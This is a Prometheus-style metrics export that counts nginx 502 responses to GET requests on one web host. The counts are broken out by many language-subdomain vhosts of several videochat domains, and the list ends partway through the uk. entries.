nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ba.videochat.cafe"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ba.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ba.videochat.tv.br"} 195 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ba.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="be.videochat.cafe"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="be.videochat.date"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="be.videochat.tv.br"} 115 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="be.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="bg.videochat.cafe"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="bg.videochat.date"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="bg.videochat.tv.br"} 94 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="bg.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="bn.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="bn.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="bn.videochat.tv.br"} 46 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="bs.videochat.cafe"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="bs.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="bs.videochat.tv.br"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="bs.videochat.world"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ca.videochat.cafe"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ca.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ca.videochat.tv.br"} 23 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ca.videochat.world"} 36 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ceb.videochat.cafe"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ceb.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ceb.videochat.tv.br"} 144 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ceb.videochat.world"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="chm.videochat.cafe"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="chm.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="chm.videochat.tv.br"} 120 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="chm.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="cs.videochat.cafe"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="cs.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="cs.videochat.tv.br"} 116 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="cs.videochat.world"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="cy.videochat.cafe"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="cy.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="cy.videochat.tv.br"} 91 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="cy.videochat.world"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="da.videochat.cafe"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="da.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="da.videochat.tv.br"} 44 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="da.videochat.world"} 51 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="de.videochat.cafe"} 85 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="de.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="de.videochat.tv.br"} 39 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="de.videochat.world"} 72 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ee.videochat.cafe"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ee.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ee.videochat.tv.br"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ee.videochat.world"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="el.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="el.videochat.tv.br"} 229 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="el.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="en.videochat.cafe"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="en.videochat.tv.br"} 78 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="eo.videochat.cafe"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="eo.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="eo.videochat.tv.br"} 97 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="eo.videochat.world"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="es.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="es.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="es.videochat.tv.br"} 31 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="es.videochat.world"} 51 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="et.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="et.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="et.videochat.tv.br"} 252 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="eu.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="eu.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="eu.videochat.tv.br"} 58 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="eu.videochat.world"} 58 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="fa.videochat.tv.br"} 36 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="fa.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="fi.videochat.cafe"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="fi.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="fi.videochat.tv.br"} 39 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="fi.videochat.world"} 51 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="fr.videochat.date"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="fr.videochat.tv.br"} 45 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="fr.videochat.world"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ga.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ga.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ga.videochat.tv.br"} 46 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ga.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="gl.videochat.cafe"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="gl.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="gl.videochat.tv.br"} 57 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="gl.videochat.world"} 60 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="gu.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="gu.videochat.tv.br"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="he.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="he.videochat.tv.br"} 57 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="he.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="hi.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="hi.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="hi.videochat.tv.br"} 74 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="hr.videochat.cafe"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="hr.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="hr.videochat.tv.br"} 145 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="hr.videochat.world"} 34 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ht.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ht.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ht.videochat.tv.br"} 49 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ht.videochat.world"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="hu.videochat.cafe"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="hu.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="hu.videochat.tv.br"} 133 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="hu.videochat.world"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="id.videochat.cafe"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="id.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="id.videochat.tv.br"} 53 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="id.videochat.world"} 59 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="is.videochat.cafe"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="is.videochat.date"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="is.videochat.tv.br"} 280 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="is.videochat.world"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="it.videochat.cafe"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="it.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="it.videochat.tv.br"} 77 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="it.videochat.world"} 29 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="jp.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="jp.videochat.tv.br"} 249 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="jp.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="jv.videochat.cafe"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="jv.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="jv.videochat.tv.br"} 272 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="jv.videochat.world"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="kk.videochat.cafe"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="kk.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="kk.videochat.tv.br"} 70 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="km.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="km.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="kn.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="kn.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="kn.videochat.tv.br"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ko.videochat.tv.br"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ko.videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ky.videochat.cafe"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ky.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ky.videochat.tv.br"} 102 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ky.videochat.world"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="lb.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="lb.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="lb.videochat.tv.br"} 35 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="lb.videochat.world"} 57 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="lo.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="lo.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="lo.videochat.tv.br"} 42 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="lt.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="lt.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="lt.videochat.tv.br"} 29 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="lt.videochat.world"} 35 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="lv.videochat.cafe"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="lv.videochat.date"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="lv.videochat.tv.br"} 52 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="lv.videochat.world"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mg.videochat.cafe"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mg.videochat.date"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mg.videochat.tv.br"} 462 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mg.videochat.world"} 43 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mi.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mi.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mi.videochat.tv.br"} 42 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mi.videochat.world"} 30 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mk.videochat.cafe"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mk.videochat.date"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mk.videochat.tv.br"} 56 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ml.videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mn.videochat.cafe"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mn.videochat.date"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mn.videochat.tv.br"} 85 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mn.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mr.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mr.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mr.videochat.tv.br"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mr.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mrj.videochat.cafe"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mrj.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mrj.videochat.tv.br"} 105 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mrj.videochat.world"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ms.videochat.cafe"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ms.videochat.date"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ms.videochat.tv.br"} 515 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ms.videochat.world"} 63 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mt.videochat.cafe"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mt.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mt.videochat.tv.br"} 191 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="mt.videochat.world"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="my.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="my.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ne.videochat.cafe"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ne.videochat.tv.br"} 55 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ne.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="nl.videochat.cafe"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="nl.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="nl.videochat.tv.br"} 37 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="nl.videochat.world"} 44 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="no.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="no.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="no.videochat.tv.br"} 192 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="no.videochat.world"} 28 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="pa.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="pa.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="pa.videochat.tv.br"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="pap.videochat.cafe"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="pap.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="pap.videochat.tv.br"} 210 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="pap.videochat.world"} 31 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="pl.videochat.cafe"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="pl.videochat.date"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="pl.videochat.tv.br"} 63 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="pl.videochat.world"} 35 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="pt.videochat.cafe"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="pt.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="pt.videochat.world"} 28 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ro.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ro.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ro.videochat.tv.br"} 38 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ro.videochat.world"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sco.videochat.cafe"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sco.videochat.date"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sco.videochat.tv.br"} 30 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sco.videochat.world"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="si.videochat.cafe"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="si.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="si.videochat.tv.br"} 85 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="si.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sk.videochat.cafe"} 27 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sk.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sk.videochat.tv.br"} 71 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sk.videochat.world"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sl.videochat.cafe"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sl.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sl.videochat.tv.br"} 95 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sl.videochat.world"} 29 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sr.videochat.cafe"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sr.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sr.videochat.tv.br"} 30 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sr.videochat.world"} 37 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="su.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="su.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="su.videochat.tv.br"} 47 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="su.videochat.world"} 29 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sv.videochat.cafe"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sv.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sv.videochat.tv.br"} 46 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sv.videochat.world"} 46 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sw.videochat.cafe"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sw.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sw.videochat.tv.br"} 74 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="sw.videochat.world"} 31 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ta.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ta.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ta.videochat.tv.br"} 190 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ta.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="te.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="te.videochat.tv.br"} 63 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="te.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="tg.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="tg.videochat.date"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="tg.videochat.tv.br"} 55 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="tg.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="th.videochat.cafe"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="th.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="th.videochat.tv.br"} 76 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="th.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="tl.videochat.cafe"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="tl.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="tl.videochat.tv.br"} 42 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="tl.videochat.world"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="tr.videochat.cafe"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="tr.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="tr.videochat.tv.br"} 78 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="tr.videochat.world"} 28 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="tt.videochat.cafe"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="tt.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="tt.videochat.tv.br"} 290 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="udm.videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="udm.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="udm.videochat.tv.br"} 174 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="udm.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="uk.videochat.cafe"} 11 